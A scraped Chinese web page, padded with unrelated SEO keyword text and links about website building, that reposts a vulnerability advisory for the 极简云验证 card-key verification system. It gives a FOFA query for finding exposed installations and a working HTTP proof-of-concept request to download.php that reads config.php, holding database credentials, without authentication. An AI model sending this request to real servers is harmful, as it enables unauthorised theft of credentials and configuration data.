当前位置: 首页 > news >正文

高端大气网站网站在别人那里已经建好了_公司里要进行修改_怎么做

高端大气网站,网站在别人那里已经建好了_公司里要进行修改_怎么做,门户网站建设需求文档,wordpress支付查看插件0x01 产品简介 极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版…

0x01 产品简介

极简云验证是一款开源的网络验证系统,支持多应用卡密生成:卡密生成 单码卡密 次数卡密 会员卡密 积分卡密、卡密管理 卡密长度 卡密封禁 批量生成 批量导出 自定义卡密前缀等;支持多应用多用户管理:应用备注 应用版本 多级代理价格 免费付费切换 验证用户IP 验证用户设备 应用开关等

0x02 漏洞概述

极简云验证 download.php 接口处存在文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,数据库账号密码等敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA: "../assets/img/bg/logo_white.png"

0x04 漏洞复现

PoC

GET /download.php?file=20b6cb088a8d5c444074&filename=config.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

http://www.yayakq.cn/news/212823/

相关文章:

  • 什么是网站建设方案网站建设合同不给版权
  • 深圳做企业网站多少钱大学生创业网站建设方案
  • 成都微信网站建设南京网站开发南京乐识强
  • 技术支持 淄博网站建设wordpress博客缩略图
  • 网站建设连接到百度外贸网站建设seo优化
  • 射洪做网站西安企业网站设计哪家专业
  • php网站是什么一个网站价格
  • 织梦自动生成手机网站建设游戏运营网站开展工作内容
  • p2p网贷网站开发网站服务器速度对seo有什么影响?
  • 河南网站网站制作.net如何建设网站
  • 建网站要多少钱维护便宜网站建设多少钱
  • 网站推广服务包括哪些厦门企业官方网站建设
  • 素材搜集网站网站建设背景介绍怎么写
  • 国家建设部网站平台网站 做购物车
  • 深圳网站定制价格表企业网站推广外包
  • 如何做视频网站赚钱网站合同建设模板
  • 网站建设的潜规则百度显示网站名
  • 福建省漳州市建设厅网站wordpress数据
  • 做网站的简称网站发布和收录怎么做
  • 自己怎么做企业网站建设五莲县财源建设网站
  • 建网站的域名合肥蜀山网站开发
  • 公司网站年费做团购的网站
  • 移动网站 做优化营销策划公司的基本
  • 电商网站开发平台一端口映射 wordpress
  • wordpress外贸站网站开发项目有哪些
  • 珍岛外贸网站建设厦门网站建设培训机构
  • 贵州网站制作哪家好宁波地区做网络推广的
  • 建设信息网站济南网站建设策划
  • 购物网站建设基本流程网站安装源码
  • 平凉市住房和城乡建设局网站赣榆区住房和城乡建设局网站